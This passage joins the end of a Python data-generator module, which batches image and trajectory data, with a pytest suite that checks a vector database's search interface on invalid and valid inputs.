leading singleton dimension squeezed out.
"""
if isinstance(container_fnames, str):
container_fnames = [container_fnames]
self._container_fnames = [os.path.abspath(fname) for fname in container_fnames]
self._data_name_offset_pairs = data_name_offset_pairs
self.transformers_dict = transformers or dict()
self.once = once
self._batch_size = None
self._squeeze = None
self.batch_size = batch_size
self.shuffle = shuffle
self.dtype = dtype
self._lock = threading.Lock()
offset_limits = dict()
for data_name, offset in data_name_offset_pairs:
offset_min, offset_max = offset_limits.get(data_name, (np.inf, -np.inf))
if isinstance(offset, int):
offset_min = min(offset, offset_min)
offset_max = max(offset, offset_max)
elif isinstance(offset, slice):
assert offset.start < offset.stop
offset_min = min(offset.start, offset_min)
offset_max = max(offset.stop, offset_max)
elif isinstance(offset, (tuple, list)):
offset_min = min(offset_min, *offset)
offset_max = max(offset_max, *offset)
else:
raise ValueError("offset should be int, slice, tuple or list, but %s was given" % offset)
offset_limits[data_name] = (offset_min, offset_max)
# shift the offsets so that the minimum of all is zero
offset_all_min = min([offset_min for (offset_min, offset_max) in offset_limits.values()])
for data_name, (offset_min, offset_max) in offset_limits.items():
offset_limits[data_name] = (offset_min - offset_all_min,
offset_max - offset_all_min)
with contextlib.ExitStack() as stack:
containers = [stack.enter_context(ImageDataContainer(fname)) for fname in self._container_fnames]
num_steps_per_traj = []
num_steps_per_container = []
num_trajs_per_container = []
for container in containers:
data_name_to_data_sizes = {}
for data_name, (offset_min, offset_max) in offset_limits.items():
num_trajs, num_steps = container.get_data_shape(data_name)
data_name_to_data_sizes[data_name] = np.array([num_steps - offset_max] * num_trajs)
data_sizes = np.array(list(data_name_to_data_sizes.values())).min(axis=0)
num_steps_per_traj.extend(data_sizes)
num_steps_per_container.append(data_sizes.sum())
num_trajs_per_container.append(len(data_sizes))
self._num_steps_per_traj = num_steps_per_traj
self._num_steps_per_container = num_steps_per_container
self._num_trajs_per_container = num_trajs_per_container
self._num_steps_per_traj_cs = np.r_[0, np.cumsum(num_steps_per_traj)]
self._num_steps_per_container_cs = np.r_[0, np.cumsum(num_steps_per_container)]
self._num_trajs_per_container_cs = np.r_[0, np.cumsum(num_trajs_per_container)]
assert self._num_steps_per_traj_cs[-1] == self._num_steps_per_container_cs[-1]
self._excerpt_generator = self._get_excerpt_generator()
@property
def batch_size(self):
if self._batch_size == 1 and self._squeeze:
batch_size = 0
else:
batch_size = self._batch_size
return batch_size
@batch_size.setter
def batch_size(self, batch_size):
if batch_size == 0:
self._batch_size = 1
self._squeeze = True
else:
self._batch_size = batch_size
self._squeeze = False
@property
def squeeze(self):
return self._squeeze
def _get_local_inds(self, all_ind):
container_ind = np.searchsorted(self._num_steps_per_container_cs[1:], all_ind, side='right')
all_traj_iter = np.searchsorted(self._num_steps_per_traj_cs[1:], all_ind, side='right')
step_iter = all_ind - self._num_steps_per_traj_cs[all_traj_iter]
traj_iter = all_traj_iter - self._num_trajs_per_container_cs[container_ind]
return container_ind, traj_iter, step_iter
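# Worked example (assumed sizes): with two containers holding trajectories of
# usable lengths [3, 2] and [4], the cumulative arrays are
#   _num_steps_per_traj_cs      = [0, 3, 5, 9]
#   _num_steps_per_container_cs = [0, 5, 9]
#   _num_trajs_per_container_cs = [0, 2, 3]
# so a global index of 6 maps to container 1, trajectory 0 within that
# container, and step 1 within that trajectory.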
def _get_excerpt_generator(self):
indices = []
continue_extending = True
while True:
if len(indices) < self._batch_size and continue_extending:
if self.shuffle:
new_indices = np.random.permutation(self.size)
else:
new_indices = np.arange(self.size)
indices.extend(new_indices)
if self.once:
continue_extending = False
excerpt = np.asarray(indices[0:self._batch_size])
del indices[0:self._batch_size]
yield excerpt
def __iter__(self):
return self
def __next__(self):
with contextlib.ExitStack() as stack:
containers = [stack.enter_context(ImageDataContainer(fname)) for fname in self._container_fnames]
with self._lock:
excerpt = next(self._excerpt_generator)
if len(excerpt) == 0:
raise StopIteration
batch_data = []
for data_name, offset in self._data_name_offset_pairs:
transformer = self.transformers_dict.get(data_name, Transformer())
datum = None # initialize later to use dtype of first single_datum
for i, all_ind in enumerate(excerpt):
container_ind, traj_iter, step_iter = self._get_local_inds(all_ind)
if isinstance(offset, int):
offsets = [offset]
elif isinstance(offset, slice):
offsets = np.arange(offset.start, offset.stop, offset.step)
single_datum_list = []
for int_offset in offsets:
single_datum = containers[container_ind].get_datum(traj_iter, step_iter + int_offset, data_name)
single_datum = np.asarray(transformer.preprocess(single_datum), dtype=self.dtype)
single_datum_list.append(single_datum)
single_datum = np.asarray(single_datum_list)
if isinstance(offset, int):
single_datum = np.squeeze(single_datum, axis=0)
if datum is None:
datum = np.empty(((len(excerpt),) + single_datum.shape), dtype=single_datum.dtype)
datum[i, ...] = single_datum
batch_data.append(datum)
if self.squeeze:
batch_data = [np.squeeze(datum, axis=0) for datum in batch_data]
return tuple(batch_data)
def next(self):
# python 2 compatible
return self.__next__()
@property
def size(self):
"""
Possible number of data points that can be returned (accounting for offsets).
"""
return self._num_steps_per_traj_cs[-1]
def iterate_minibatches_generic(data, once=False, batch_size=0, shuffle=False):
if batch_size == 0:
non_zero_batch_size = 1
squeeze = True
else:
non_zero_batch_size = batch_size
squeeze = False
size = len(data[0])
assert all(len(datum) == size for datum in data)
indices = []
continue_extending = True
while indices or continue_extending:
if len(indices) < non_zero_batch_size and continue_extending:
if shuffle:
new_indices = np.random.permutation(size)
else:
new_indices = np.arange(size)
indices.extend(new_indices)
if once:
continue_extending = False
excerpt = np.asarray(indices[0:non_zero_batch_size])
del indices[0:non_zero_batch_size]
batch_data = [(datum[excerpt] if isinstance(datum, np.ndarray)
else [datum[ind] for ind in excerpt]) for datum in data]
if squeeze:
batch_data = [np.squeeze(batch_datum, axis=0) for batch_datum in batch_data]
yield batch_data
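# Minimal usage sketch (assumed data): iterating two arrays of length 4 in
# shuffled batches of 2 yields two batches per pass, each a list with one
# excerpt per input array.
#   xs, ys = np.arange(4), np.arange(4) * 10
#   for batch_x, batch_y in iterate_minibatches_generic([xs, ys], once=True,
#                                                       batch_size=2,
#                                                       shuffle=True):
#       pass  # batch_x.shape == (2,), batch_y.shape == (2,)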
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('container_fname', nargs='+', type=str)
args = parser.parse_args()
image_transformer = CompositionTransformer(
[ImageTransformer(scale_size=0.125, crop_size=(32, 32)),
OpsTransformer(scale=2.0 / 255.0, offset=-1.0, transpose=(2, 0, 1))])
action_transformer = OpsTransformer(scale=0.1)
transformers = {'image': image_transformer, 'action': action_transformer}
data_name_offset_pairs = [('image', 0), ('action', 0), ('image', 1)]
generator = DataGenerator(args.container_fname,
data_name_offset_pairs=data_name_offset_pairs,
transformers=transformers,
batch_size=32, shuffle=True, once=True)
generator = ParallelGenerator(generator, nb_worker=4)
time.sleep(1.0)
start_time = time.time()
for i, batch_data in zip(range(4), generator):
print(batch_data[0].shape)
print(time.time() - start_time)
if __name__ == "__main__":
main()
|
test_search.py
|
import threading
import time
import pytest
import random
import numpy as np
from base.client_base import TestcaseBase
from utils.util_log import test_log as log
from common import common_func as cf
from common import common_type as ct
from common.common_type import CaseLabel, CheckTasks
prefix = "search_collection"
epsilon = ct.epsilon
default_nb = ct.default_nb
default_nq = ct.default_nq
default_dim = ct.default_dim
default_limit = ct.default_limit
default_search_exp = "int64 >= 0"
default_search_field = ct.default_float_vec_field_name
default_search_params = ct.default_search_params
default_int64_field_name = ct.default_int64_field_name
default_float_field_name = ct.default_float_field_name
class TestCollectionSearch(TestcaseBase):
""" Test case of search interface """
"""
******************************************************************
    # The following are invalid cases
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L1)
def test_search_no_connection(self):
"""
target: test search without connection
method: create and delete connection, then search
expected: raise exception and report the error
"""
log.info("Test case of search interface: test_search_no_connection")
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. remove connection
log.info("test_search_no_connection: removing connection")
self.connection_wrap.remove_connection(alias='default')
log.info("test_search_no_connection: removed connection")
# 3. search without connection
log.info("test_search_no_connection: searching without connection")
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1, "err_msg": "should create connect first"})
@pytest.mark.tags(CaseLabel.L1)
def test_search_no_collection(self):
"""
        target: test the scenario of searching a non-existent collection
method: 1. create collection
2. drop collection
3. search the dropped collection
expected: raise exception and report the error
"""
log.info("Test case of search interface: test_search_no_collection "
"(searching the non-exist collection)")
# 1. initialize without data
collection_w = self.init_collection_general(prefix)[0]
# 2. Drop collection
collection_w.drop()
# 3. Search without collection
log.info("test_search_no_collection: Searching without collection ")
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
collection_w.search(vectors, default_search_field,
default_search_params, default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "collection %s doesn't exist!" % collection_w.name})
@pytest.mark.tags(CaseLabel.L1)
def test_search_release_collection(self):
"""
        target: test the scenario of searching a released collection
method: 1. create collection
2. release collection
3. search the released collection
expected: raise exception and report the error
"""
log.info("Test case of search interface: test_search_release_collection")
# 1. initialize without data
collection_w = self.init_collection_general(prefix, True, 10, 1)[0]
# 2. release collection
collection_w.release()
# 3. Search the released collection
log.info("test_search_release_collection: Searching without collection ")
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
collection_w.search(vectors, default_search_field,
default_search_params, default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "collection %s was not loaded "
"into memory" % collection_w.name})
@pytest.mark.tags(CaseLabel.L1)
def test_search_release_partition(self):
"""
        target: test the scenario of searching a released partition
method: 1. create collection
2. release partition
3. search with specifying the released partition
expected: raise exception and report the error
"""
log.info("Test case of search interface: test_search_release_partition")
# 1. initialize with data
partition_num = 1
collection_w = self.init_collection_general(prefix, True, 1000, partition_num)[0]
par = collection_w.partitions
par_name = par[partition_num].name
# 2. release partition
conn = self.connection_wrap.get_connection()[0]
conn.release_partitions(collection_w.name, [par_name])
# 3. Search the released partition
log.info("test_search_release_partition: Searching specifying the released partition")
limit = 1000
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
collection_w.search(vectors, default_search_field,
default_search_params, limit, default_search_exp,
[par_name],
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "partition has been released"})
@pytest.mark.tags(CaseLabel.L1)
def test_search_with_empty_collection(self):
"""
        target: test search with an empty collection
method: search the empty collection
expected: raise exception and report the error
"""
log.info("Test case of search interface: test_search_with_empty_collection")
# 1. initialize without data
collection_w = self.init_collection_general(prefix)[0]
# 2. search collection without data before load
log.info("test_search_with_empty_collection: Searching empty collection %s"
% collection_w.name)
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
err_msg = "collection" + collection_w.name + "was not loaded into memory"
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
default_limit, default_search_exp, timeout=1,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": err_msg})
# 3. search collection without data after load
collection_w.load()
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
default_limit, default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": [],
"limit": 0})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_missing(self):
"""
target: test search with incomplete parameters
method: search with incomplete parameters
expected: raise exception and report the error
"""
log.info("Test case of search interface: test_search_param_missing")
# 1. initialize without data
collection_w = self.init_collection_general(prefix, True)[0]
# 2. search collection with missing parameters
log.info("test_search_param_missing: Searching collection %s "
"with missing parameters" % collection_w.name)
try:
collection_w.search()
except TypeError as e:
assert "missing 4 required positional arguments: 'data', " \
"'anns_field', 'param', and 'limit'" in str(e)
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_dim(self):
"""
target: test search with invalid parameter values
method: search with invalid dim
expected: raise exception and report the error
"""
log.info("Test case of search interface: test_search_param_invalid_dim")
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True)[0]
# 2. search with invalid dim
log.info("test_search_param_invalid_dim: searching with invalid dim")
wrong_dim = 129
vectors = [[random.random() for _ in range(wrong_dim)] for _ in range(default_nq)]
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "The dimension of query entities "
"is different from schema"})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_metric_type(self):
"""
target: test search with invalid parameter values
method: search with invalid metric type
expected: raise exception and report the error
"""
log.info("Test case of search interface: test_search_param_invalid_metric_type")
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True)[0]
# 2. search with invalid metric_type
log.info("test_search_param_invalid_metric_type: searching with invalid metric_type")
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
search_params = {"metric_type": "L10", "params": {"nprobe": 10}}
collection_w.search(vectors[:default_nq], default_search_field, search_params,
default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "metric type not found"})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("limit", [0, 16385])
def test_search_param_invalid_limit(self, limit):
"""
target: test search with invalid parameter values
method: search with invalid limit: 0 and maximum
expected: raise exception and report the error
"""
log.info("Test case of search interface: test_search_param_invalid_limit")
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True)[0]
# 2. search with invalid limit (topK)
log.info("test_search_param_invalid_limit: searching with "
"invalid limit (topK) = %s" % limit)
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
err_msg = "limit %d is too large!" % limit
if limit == 0:
err_msg = "`limit` value 0 is illegal"
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": err_msg})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.xfail(reason="issue 6259")
@pytest.mark.parametrize("invalid_search_field",
["", " ", "float-vector"])
def test_search_param_invalid_field(self, invalid_search_field):
"""
target: test search with invalid parameter values
method: search with invalid field
expected: raise exception and report the error
"""
log.info("Test case of search interface: test_search_param_invalid_field")
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True)[0]
# 2. search with invalid field
log.info("test_search_param_invalid_field: searching with "
"invalid field: %s" % invalid_search_field)
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
collection_w.search(vectors[:default_nq], invalid_search_field, default_search_params,
default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "invalid search field"})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("invalid_search_expr",
[" ", "int63 >= 0"])
def test_search_param_invalid_expr(self, invalid_search_expr):
"""
target: test search with invalid parameter values
method: search with invalid search expressions
expected: raise exception and report the error
"""
log.info("Test case of search interface: test_search_param_invalid_expr")
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True)[0]
# 2 search with invalid expr
log.info("test_search_param_invalid_expr: searching with "
"invalid expr: %s" % invalid_search_expr)
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit, invalid_search_expr,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "invalid expression %s"
% invalid_search_expr})
@pytest.mark.tags(CaseLabel.L1)
def test_search_partition_deleted(self):
"""
target: test search deleted partition
method: 1. search the collection
2. delete a partition
3. search the deleted partition
expected: raise exception and report the error
"""
log.info("test_search_partition_deleted: test search after partition deletion")
# 1. initialize with data
partition_num = 1
collection_w = self.init_collection_general(prefix, True, 1000, partition_num)[0]
# 2. delete partitions
log.info("test_search_partition_deleted: deleting a partition")
par = collection_w.partitions
deleted_par_name = par[partition_num].name
collection_w.drop_partition(deleted_par_name)
log.info("test_search_partition_deleted: deleted a partition")
collection_w.load()
# 3. search after delete partitions
log.info("test_search_partition_deleted: searching deleted partition")
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit, default_search_exp,
[deleted_par_name],
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "PartitonName: %s not found" % deleted_par_name})
@pytest.mark.tags(CaseLabel.L1)
def test_search_index_partition_not_existed(self):
"""
target: test search not existed partition
method: search with not existed partition
expected: raise exception and report the error
"""
log.info("Test case of search interface: test_search_index_partition_not_existed")
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True)[0]
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
# 2. create index
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
# 3. search the non exist partition
partition_name = "search_non-exist"
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
default_limit, default_search_exp, [partition_name],
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "PartitonName: %s not found" % partition_name})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_binary(self):
"""
target: test search within binary data (invalid parameter)
method: search with wrong metric type
expected: raise exception and report the error
"""
log.info("test_search_param_invalid_binary: test invalid paramter with binary data")
# 1. initialize with binary data
collection_w = self.init_collection_general(prefix, True, is_binary=True)[0]
# 2. create index
default_index = {"index_type": "BIN_IVF_FLAT", "params": {"nlist": 128}, "metric_type": "JACCARD"}
collection_w.create_index("binary_vector", default_index)
# 3. search with exception
binary_vectors = cf.gen_binary_vectors(3000, default_dim)[1]
wrong_search_params = {"metric_type": "L2", "params": {"nprobe": 10}}
collection_w.search(binary_vectors[:default_nq], "binary_vector", wrong_search_params,
default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "unsupported"})
@pytest.mark.tags(CaseLabel.L1)
def test_search_binary_flat_with_L2(self):
"""
        target: search binary collection using FLAT with L2
method: search binary collection using FLAT with L2
expected: raise exception and report error
"""
log.info("Test case of search interface: test_search_binary_flat_with_L2")
# 1. initialize with binary data
collection_w = self.init_collection_general(prefix, True, is_binary=True)[0]
# 2. search and assert
query_raw_vector, binary_vectors = cf.gen_binary_vectors(3000, default_dim)
search_params = {"metric_type": "L2", "params": {"nprobe": 10}}
collection_w.search(binary_vectors[:default_nq], "binary_vector",
search_params, default_limit, "int64 >= 0",
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "Search failed"})
@pytest.mark.tags(CaseLabel.L1)
def test_search_output_field_vector(self):
"""
target: test search with vector as output field
method: search with one vector output_field
expected: raise exception and report the error
"""
log.info("Test case of search interface: test_search_output_field_vector")
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True)[0]
# 2. search
log.info("test_search_output_field_vector: Searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, output_fields=[default_search_field],
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "Search doesn't support "
"vector field as output_fields"})
"""
******************************************************************
# The following are valid base cases
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_search_normal(self):
"""
target: test search normal case
method: create connection, collection, insert and search
expected: search successfully with limit(topK)
"""
log.info("Test case of search interface: test_search_normal")
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True)
# 2. search
log.info("test_search_normal: searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit})
@pytest.mark.tags(CaseLabel.L1)
def test_search_with_empty_vectors(self):
"""
target: test search with empty query vector
method: search using empty query vector
expected: search successfully with 0 results
"""
log.info("Test case of search interface: test_search_with_empty_vectors")
# 1. initialize without data
collection_w = self.init_collection_general(prefix, True)[0]
# 2. search collection without data
log.info("test_search_with_empty_vectors: Searching collection %s "
"using empty vector" % collection_w.name)
collection_w.search([], default_search_field, default_search_params,
default_limit, default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": 0})
@pytest.mark.tags(CaseLabel.L1)
def test_search_before_after_delete(self):
"""
target: test search function before and after deletion
method: 1. search the collection
2. delete a partition
3. search the collection
expected: the deleted entities should not be searched
"""
log.info("test_search_before_after_delete: test search after deleting entities")
# 1. initialize with data
partition_num = 1
nb = 1000
limit = 1000
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb, partition_num)
# 2. search all the partitions before partition deletion
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
log.info("test_search_before_after_delete: searching before deleting partitions")
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, limit, default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": limit})
# 3. delete partitions
log.info("test_search_before_after_delete: deleting a partition")
par = collection_w.partitions
deleted_entity_num = par[partition_num].num_entities
entity_num = nb - deleted_entity_num
collection_w.drop_partition(par[partition_num].name)
log.info("test_search_before_after_delete: deleted a partition")
collection_w.load()
# 4. search non-deleted part after delete partitions
log.info("test_search_before_after_delete: searching after deleting partitions")
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, limit, default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids[:entity_num],
"limit": limit-deleted_entity_num})
@pytest.mark.tags(CaseLabel.L2)
def test_search_partition_after_release_one(self):
"""
target: test search function before and after release
method: 1. search the collection
2. release a partition
3. search the collection
        expected: entities in the released partition should not be returned
"""
log.info("test_search_partition_after_release_one: test search after releasing entities")
# 1. initialize with data
nb = 1000
limit = 1000
partition_num = 1
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb, partition_num)
        # 2. search all the partitions before releasing one
        vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
        log.info("test_search_partition_after_release_one: searching before releasing a partition")
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, limit, default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": limit})
# 3. release one partition
log.info("test_search_partition_after_release_one: releasing a partition")
par = collection_w.partitions
deleted_entity_num = par[partition_num].num_entities
entity_num = nb - deleted_entity_num
conn = self.connection_wrap.get_connection()[0]
conn.release_partitions(collection_w.name, [par[partition_num].name])
log.info("test_search_partition_after_release_one: released a partition")
# 4. search collection after release one partition
log.info("test_search_partition_after_release_one: searching after deleting partitions")
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, limit, default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids[:entity_num],
"limit": limit - deleted_entity_num})
@pytest.mark.tags(CaseLabel.L2)
def test_search_partition_after_release_all(self):
"""
target: test search function before and after release
method: 1. search the collection
                2. release all partitions
                3. search the collection
        expected: no entities should be returned after all partitions are released
"""
log.info("test_search_before_after_release: test search after releasing entities")
# 1. initialize with data
nb = 1000
limit = 1000
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb, 1)
        # 2. search all the partitions before releasing them
        vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
        log.info("test_search_partition_after_release_all: searching before releasing partitions")
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, limit, default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": limit})
# 3. release all partitions
log.info("test_search_partition_after_release_all: releasing a partition")
par = collection_w.partitions
conn = self.connection_wrap.get_connection()[0]
conn.release_partitions(collection_w.name, [par[0].name, par[1].name])
log.info("test_search_partition_after_release_all: released a partition")
# 4. search collection after release all partitions
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, limit, default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": [],
"limit": 0})
@pytest.mark.tags(CaseLabel.L2)
def test_search_collection_after_release_load(self):
"""
target: search the pre-released collection after load
method: 1. create collection
2. release collection
3. load collection
4. search the pre-released collection
expected: search successfully
"""
log.info("Test case of search interface: test_search_collection_after_release_load")
# 1. initialize without data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, default_nb, 1)
# 2. release collection
collection_w.release()
# 3. Search the pre-released collection after load
collection_w.load()
log.info("test_search_partition_after_release_load: searching after load")
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
default_limit, default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit})
@pytest.mark.tags(CaseLabel.L2)
def test_search_partition_after_release_load(self):
"""
target: search the pre-released collection after load
method: 1. create collection
2. release a partition
3. load partition
                4. search the pre-released partition
expected: search successfully
"""
log.info("Test case of search interface: test_search_partition_after_release_load")
# 1. initialize without data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, default_nb, 1)
        # 2. release a partition
log.info("test_search_partition_after_release_load: releasing a partition")
par = collection_w.partitions
conn = self.connection_wrap.get_connection()[0]
conn.release_partitions(collection_w.name, [par[1].name])
log.info("test_search_partition_after_release_load: released a partition")
# 3. Search the collection after load
limit = 1000
collection_w.load()
log.info("test_search_partition_after_release_load: searching after load")
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
limit, default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": limit})
# 4. Search the pre-released partition after load
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
limit, default_search_exp,
[par[1].name],
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids[par[0].num_entities:],
"limit": par[1].num_entities})
@pytest.mark.tags(CaseLabel.L2)
def test_search_load_flush_load(self):
"""
        target: test search on data that was loaded before flush
        method: 1. create a collection and insert data
                2. load the collection
                3. flush, then load again
                4. search the collection
        expected: search success with limit(topK)
        """
        log.info("Test case of search interface: test_search_load_flush_load")
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. insert data
insert_ids = cf.insert_data(collection_w, default_nb)[3]
# 3. load data
collection_w.load()
# 4. flush and load
        collection_w.num_entities  # accessing num_entities triggers a flush of the inserted data
        collection_w.load()
        # 5. search the collection
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit, default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.xfail(reason="issue 5858")
def test_search_new_data(self):
"""
target: test search new inserted data without load
method: 1. search the collection
2. insert new data
3. search the collection without load again
expected: new data should be searched
"""
log.info("test_search_new_data: search new data without another load")
# 1. initialize with data
limit = 1000
nb_old = 500
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb_old)
# 2. search for original data after load
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
log.info("test_search_new_data: searching for original data after load")
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, limit, default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": nb_old})
# 3. insert new data
nb_new = 300
insert_ids_new = cf.insert_data(collection_w, nb_new)[3]
insert_ids.extend(insert_ids_new)
# 4. search for new data without load
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, limit, default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": nb_old+nb_new})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("index, params",
zip(ct.all_index_types[:9],
ct.default_index_params[:9]))
def test_search_after_different_index(self, index, params):
"""
target: test search with different index
method: test search with different index
expected: searched successfully
"""
log.info("Test case of search interface: test_search_after_different_index")
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, partition_num=1)
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
# 2. create different index
log.info("test_search_after_different_index: Creating index-%s" % index)
default_index = {"index_type": index, "params": params, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
log.info("test_search_after_different_index: Created index-%s" % index)
# 3. search
log.info("test_search_after_different_index: Searching after creating index-%s" % index)
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit, default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("index, params",
zip(ct.all_index_types[:9],
ct.default_index_params[:9]))
def test_search_after_index_different_metric_type(self, index, params):
"""
target: test search with different metric type
method: test search with different metric type
expected: searched successfully
"""
log.info("Test case of search interface: test_search_after_index_different_metric_type")
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, partition_num=1)
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
# 2. create different index
log.info("test_search_after_different_index: Creating index-%s" % index)
default_index = {"index_type": index, "params": params, "metric_type": "IP"}
collection_w.create_index("float_vector", default_index)
log.info("test_search_after_different_index: Created index-%s" % index)
# 3. search
log.info("test_search_after_different_index: Searching after creating index-%s" % index)
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit, default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit})
@pytest.mark.tags(CaseLabel.L1)
